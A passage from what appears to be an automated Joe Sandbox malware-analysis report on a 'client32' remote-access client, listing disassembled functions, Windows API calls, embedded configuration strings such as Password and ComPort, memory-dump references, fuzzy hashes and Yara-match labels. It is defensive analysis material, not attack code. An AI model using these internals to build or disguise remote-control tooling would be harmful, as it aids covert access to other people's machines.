                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$BringCurrentIconicShowThread
                                                        • String ID:
                                                        • API String ID: 4184413098-0
                                                        • Opcode ID: d925559f559c2a1babfa56e082f61c15d26bdf959c9a64c67aafbf439c555b20
                                                        • Instruction ID: ad5466151a3d102bc84d22bce7331062c3264b6d9f279f2b8dca4e33c95fbde4
                                                        • Opcode Fuzzy Hash: d925559f559c2a1babfa56e082f61c15d26bdf959c9a64c67aafbf439c555b20
                                                        • Instruction Fuzzy Hash: 9731917AE016159FDB14DF28D8C0BDA7BA4AF48354F09846AEC059F386D774E844CBE4
                                                        Function 11031300 Relevance: 3.0, APIs: 2, Instructions: 49clipboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 11031356
                                                        • SetClipboardData.USER32(00000000,00000000), ref: 11031372
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Clipboard$DataFormatName
                                                        • String ID:
                                                        • API String ID: 3172747766-0
                                                        • Opcode ID: c368b33a726b0f3c658c7c5764f9fe45bd421e2bcf66c613ff5b6d93b4405f57
                                                        • Instruction ID: 5a9ba92f3b64397a12cca0f87665bff893f2c78cd86a97b99a1c74ad90e41dcc
                                                        • Opcode Fuzzy Hash: c368b33a726b0f3c658c7c5764f9fe45bd421e2bcf66c613ff5b6d93b4405f57
                                                        • Instruction Fuzzy Hash: B701B574D26514EED700DF60884097EB3BCAF8964BF108196EC4095484EF35960086A6
                                                        Function 1112D2C0 Relevance: 56.4, APIs: 27, Strings: 5, Instructions: 377windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • BeginPaint.USER32(00000000,?,?,?,00000000), ref: 1112D2EF
                                                        • GetClientRect.USER32(?,?), ref: 1112D31F
                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 1112D33A
                                                        • SelectObject.GDI32(00000000,00000000), ref: 1112D34E
                                                        • SelectObject.GDI32(00000000,?), ref: 1112D35B
                                                        • GetTextColor.GDI32(00000000), ref: 1112D376
                                                        • GetBkMode.GDI32(00000000), ref: 1112D383
                                                        • SetBkMode.GDI32(00000000,00000001), ref: 1112D392
                                                        • SetRect.USER32(?,00000005,00000005,?,?), ref: 1112D3E3
                                                        • SetTextColor.GDI32(00000000,00FFFFFF), ref: 1112D3EF
                                                        • DrawTextA.USER32(00000000,?,?,?,00000020), ref: 1112D45A
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Text$ColorModeObjectRectSelect$BeginBitmapClientCompatibleCreateDrawErrorExitLastMessagePaintProcesswsprintf
                                                        • String ID: %d %s$IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 3020923283-29264745
                                                        • Opcode ID: d59ffdd2591979c44c829f97319ea5c8735ab796786ff22a7aabfc1422cc5b0b
                                                        • Instruction ID: e4a614af463f3ba32ae6b948dbfb1b6a5cc0be9bddc6f11eb1a9c30d18065d07
                                                        • Opcode Fuzzy Hash: d59ffdd2591979c44c829f97319ea5c8735ab796786ff22a7aabfc1422cc5b0b
                                                        • Instruction Fuzzy Hash: F1E17CB5A00256AFDB15CF64CD84FEEF7B5BF48304F508199E519A7644EB30AA84CFA0
                                                        Function 11015190 Relevance: 54.4, APIs: 29, Strings: 2, Instructions: 174COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • BeginPaint.USER32(?,?), ref: 110151BF
                                                        • GetWindowRect.USER32(00000000,?), ref: 110151EC
                                                        • _memset.LIBCMT ref: 110151FA
                                                        • CreateFontIndirectA.GDI32(?), ref: 11015216
                                                        • SelectObject.GDI32(00000000,00000000), ref: 1101522A
                                                        • SetBkMode.GDI32(00000000,00000001), ref: 11015235
                                                        • BeginPath.GDI32(00000000), ref: 11015242
                                                        • TextOutA.GDI32(00000000,00000000,00000000), ref: 11015260
                                                        • EndPath.GDI32(00000000), ref: 11015267
                                                        • PathToRegion.GDI32(00000000), ref: 1101526E
                                                        • CreateSolidBrush.GDI32(?), ref: 11015280
                                                        • CreateSolidBrush.GDI32(?), ref: 11015296
                                                        • CreatePen.GDI32(00000000,00000002,?), ref: 110152B0
                                                        • SelectObject.GDI32(00000000,00000000), ref: 110152BE
                                                        • SelectObject.GDI32(00000000,?), ref: 110152CE
                                                        • GetRgnBox.GDI32(00000000,?), ref: 110152DB
                                                        • OffsetRgn.GDI32(00000000,?,00000000), ref: 110152FA
                                                        • FillRgn.GDI32(00000000,00000000,?), ref: 11015309
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • FrameRgn.GDI32(00000000,00000000,?,00000002,00000002), ref: 1101531C
                                                        • DeleteObject.GDI32(00000000), ref: 11015329
                                                        • SelectObject.GDI32(00000000,?), ref: 11015333
                                                        • SelectObject.GDI32(00000000,?), ref: 1101533D
                                                        • DeleteObject.GDI32(?), ref: 11015346
                                                        • DeleteObject.GDI32(?), ref: 1101534F
                                                        • DeleteObject.GDI32(?), ref: 11015358
                                                        • SelectObject.GDI32(00000000,?), ref: 11015362
                                                        • DeleteObject.GDI32(?), ref: 1101536B
                                                        • SetBkMode.GDI32(00000000,?), ref: 11015375
                                                        • EndPaint.USER32(?,?), ref: 11015389
                                                        Strings
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110151D2
                                                        • m_hWnd, xrefs: 110151D7
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Object$Select$Delete$Create$Path$BeginBrushModePaintSolid$ErrorExitFillFontFrameIndirectLastMessageOffsetProcessRectRegionTextWindow_memsetwsprintf
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 494162906-1557312927
                                                        • Opcode ID: 06ae283321112b545d0f64b3b06f8fd0a25e3972faa2f6290334117dc8ba537b
                                                        • Instruction ID: 0dae53ec8a8f700d59e9fcd6d9c10e05b93e955bbe6dfdf0a8bc5eab80720995
                                                        • Opcode Fuzzy Hash: 06ae283321112b545d0f64b3b06f8fd0a25e3972faa2f6290334117dc8ba537b
                                                        • Instruction Fuzzy Hash: 77511BB6A00228AFDB11DBA4CC88FAEF7B9BF89304F108599F515D7244DB749A44CF61
                                                        Function 11119230 Relevance: 51.0, APIs: 18, Strings: 11, Instructions: 202libraryprocessloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(Kernel32.dll,82E0FB89,75A33760,?,75A37A80), ref: 11119277
                                                        • GetCurrentProcess.KERNEL32 ref: 111192FA
                                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 1111930E
                                                        • SetLastError.KERNEL32(00000078), ref: 11119328
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1111934E
                                                        • _memset.LIBCMT ref: 111193AC
                                                        • CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 111193F1
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11119408
                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 11119422
                                                        • CloseHandle.KERNEL32(?), ref: 11119446
                                                        • CloseHandle.KERNEL32(?), ref: 1111944F
                                                        • FreeLibrary.KERNEL32(?), ref: 1111949C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$CloseHandleLibrary$AddressCodeCreateCurrentErrorExitFileFreeLastLoadModuleNameObjectProcSingleWait_memset
                                                        • String ID: "$CSmartcardDeviceMngr - PscrInstallDeviceW failed (%d)$CSmartcardDeviceMngr - failed to load pscrinst.dll (%d)$D$IsWow64Process$Kernel32.dll$PscrInstallDeviceW$Root\NS-PseudoSmartCardReader$\winst64.exe" /q /q /si$nspscr.inf$pscrinst.dll
                                                        • API String ID: 3751713381-2378866903
                                                        • Opcode ID: 1c1322a16d27d7fc49c8e8f33464c3f22e0f6ef2ff991863d38a7f21db42ab11
                                                        • Instruction ID: d56570f91637704808b564973e54e4635ab13e3ba2239a0607908c76791a74b6
                                                        • Opcode Fuzzy Hash: 1c1322a16d27d7fc49c8e8f33464c3f22e0f6ef2ff991863d38a7f21db42ab11
                                                        • Instruction Fuzzy Hash: 35817DB5D412699FCB20DFA5DDC8A9DFBB9FB48304F1441EAE419A3244DB305A80CF51
                                                        Function 11029000 Relevance: 47.5, APIs: 8, Strings: 19, Instructions: 259libraryloaderwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                        • LoadLibraryA.KERNEL32(-00000001,00000000,Bridge,Protocol,00000000,00000000,00000002,00000000), ref: 11029067
                                                        • GetLastError.KERNEL32 ref: 1102907B
                                                        • GetProcAddress.KERNEL32(00000000,br_open), ref: 110290B5
                                                        • GetProcAddress.KERNEL32(00000000,br_close), ref: 110290DA
                                                        • GetProcAddress.KERNEL32(00000000,br_status), ref: 110290FF
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • _memset.LIBCMT ref: 1102932D
                                                        • LoadIconA.USER32(00000000,0000045C), ref: 1102937A
                                                        • Shell_NotifyIconA.SHELL32(00000001,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 11029396
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$ErrorIconLastLoad$ExitLibraryMessageNotifyProcessShell___wcstoi64_memsetwsprintf
                                                        • String ID: *MSN$BaudRate$Bridge$CAPICAPICAPI$CLIENT32.CPP$ComPort$Debug$Inactivity$LoadOnStartup$Modem$Password$PasswordFile$Protocol$br_close$br_open$br_status$com%d %d /A%d /B%d /D%d /M%s /P%s /T%d /N%s$ipbr32.dll$tcbr32.dll
                                                        • API String ID: 2737259558-2044059647
                                                        • Opcode ID: 11b142ccfe591048df726263d131c869bb881a3fb8d325d09ae5b9e0eab2801d
                                                        • Instruction ID: 80f35169613b91d4f5af84d87da118ffc0d981a7cb71d091b144a322eb08291e
                                                        • Opcode Fuzzy Hash: 11b142ccfe591048df726263d131c869bb881a3fb8d325d09ae5b9e0eab2801d
                                                        • Instruction Fuzzy Hash: BD91D375E01666AFDB11DF65CCC4FDEF7A9AB4530CF5081A5F918A7280EA70A9408F90
                                                        Function 11119540 Relevance: 47.4, APIs: 17, Strings: 10, Instructions: 190libraryprocessloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(Kernel32.dll,?,00000001,82E0FB89,75A33760,?,75A37A80), ref: 111195B7
                                                        • GetCurrentProcess.KERNEL32 ref: 11119635
                                                        • GetProcAddress.KERNEL32(?,IsWow64Process), ref: 11119649
                                                        • SetLastError.KERNEL32(00000078), ref: 11119667
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1111968D
                                                        • _memset.LIBCMT ref: 111196EB
                                                        • CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 11119730
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11119747
                                                        • CloseHandle.KERNEL32(?), ref: 1111975A
                                                        • CloseHandle.KERNEL32(?), ref: 11119763
                                                        • SetEvent.KERNEL32(?), ref: 111197C8
                                                        • FreeLibrary.KERNEL32(?), ref: 111197D9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseHandleLibraryProcess$AddressCreateCurrentErrorEventFileFreeLastLoadModuleNameObjectProcSingleWait_memset
                                                        • String ID: "$CSmartcardDeviceMngr - PscrRemoveDeviceW failed (%d)$CSmartcardDeviceMngr - failed to load pscrinst.dll (%d)$D$IsWow64Process$Kernel32.dll$PscrRemoveDeviceW$Root\NS-PseudoSmartCardReader$\winst64.exe" /q /q /su$pscrinst.dll
                                                        • API String ID: 389065776-834071892
                                                        • Opcode ID: c44578842d204993e841975f1a3fa7606336999d1f0e71b0295d9c2100f7e49a
                                                        • Instruction ID: 4bb953576de971cc88626846f630ee5a2f793e05f54183a9a7552dd7088d59e1
                                                        • Opcode Fuzzy Hash: c44578842d204993e841975f1a3fa7606336999d1f0e71b0295d9c2100f7e49a
                                                        • Instruction Fuzzy Hash: D4716FB59016389FCB10DF64DC88A9EFBB9FF49714F1481EAE419A7244DB705A80CFA1
                                                        Function 11005340 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 214windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 110596B0: __itow.LIBCMT ref: 110596D5
                                                        • GetObjectA.GDI32(?,0000003C,?), ref: 11005415
                                                          • Part of subcall function 111028F0: _malloc.LIBCMT ref: 111028F9
                                                          • Part of subcall function 111028F0: _memset.LIBCMT ref: 11102922
                                                        • wsprintfA.USER32 ref: 1100546D
                                                        • DeleteObject.GDI32(?), ref: 110054C2
                                                        • DeleteObject.GDI32(?), ref: 110054CB
                                                        • SelectObject.GDI32(?,?), ref: 110054E2
                                                        • DeleteObject.GDI32(?), ref: 110054E8
                                                        • DeleteDC.GDI32(?), ref: 110054EE
                                                        • SelectObject.GDI32(?,?), ref: 110054FF
                                                        • DeleteObject.GDI32(?), ref: 11005508
                                                        • DeleteDC.GDI32(?), ref: 1100550E
                                                        • DeleteObject.GDI32(?), ref: 1100551F
                                                        • DeleteObject.GDI32(?), ref: 1100554A
                                                        • DeleteObject.GDI32(?), ref: 11005568
                                                        • DeleteObject.GDI32(?), ref: 11005571
                                                        • ShowWindow.USER32(?,00000009), ref: 1100559F
                                                        • PostQuitMessage.USER32(00000000), ref: 110055A7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
                                                        • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                        • API String ID: 2789700732-770455996
                                                        • Opcode ID: bffa70751cd7c6e62ae0059442501a3dca6783ea3bd189fee305e70bee420e80
                                                        • Instruction ID: 9e125dedda538187a29fc8d034e3741b0da66b6e6d06abace117032ecdb9a76e
                                                        • Opcode Fuzzy Hash: bffa70751cd7c6e62ae0059442501a3dca6783ea3bd189fee305e70bee420e80
                                                        • Instruction Fuzzy Hash: C0813775A00615AFD765EBA5C890EEBF7F9AF8C304F00854CE69697241DA70F901CF60
                                                        Function 11003760 Relevance: 40.7, APIs: 27, Instructions: 240COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSysColor.USER32(00000004), ref: 110037BF
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 110037DA
                                                        • GetSysColor.USER32(00000010), ref: 110037ED
                                                        • GetSysColor.USER32(00000010), ref: 11003804
                                                        • GetSysColor.USER32(00000014), ref: 1100381B
                                                        • GetSysColor.USER32(00000014), ref: 11003832
                                                        • GetSysColor.USER32(00000014), ref: 11003855
                                                        • GetSysColor.USER32(00000014), ref: 1100386C
                                                        • GetSysColor.USER32(00000010), ref: 11003883
                                                        • GetSysColor.USER32(00000010), ref: 1100389A
                                                        • GetSysColor.USER32(00000004), ref: 110038B1
                                                        • SetBkColor.GDI32(00000000,00000000), ref: 110038B8
                                                        • InflateRect.USER32(?,000000FE,000000FD), ref: 110038C6
                                                        • GetSysColor.USER32(00000010), ref: 110038E2
                                                        • CreatePen.GDI32(?,00000001,00000000), ref: 110038EB
                                                        • SelectObject.GDI32(00000000,00000000), ref: 110038F9
                                                        • MoveToEx.GDI32(00000000,?,?,00000000), ref: 11003912
                                                        • LineTo.GDI32(00000000,?,?), ref: 11003926
                                                        • SelectObject.GDI32(00000000,?), ref: 11003934
                                                        • DeleteObject.GDI32(?), ref: 1100393E
                                                        • GetSysColor.USER32(00000014), ref: 1100394C
                                                        • CreatePen.GDI32(?,00000001,00000000), ref: 11003955
                                                        • SelectObject.GDI32(00000000,00000000), ref: 11003962
                                                        • MoveToEx.GDI32(00000000,?,?,00000000), ref: 1100397E
                                                        • LineTo.GDI32(00000000,?,?), ref: 11003995
                                                        • SelectObject.GDI32(00000000,?), ref: 110039A3
                                                        • DeleteObject.GDI32(00000000), ref: 110039AA
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
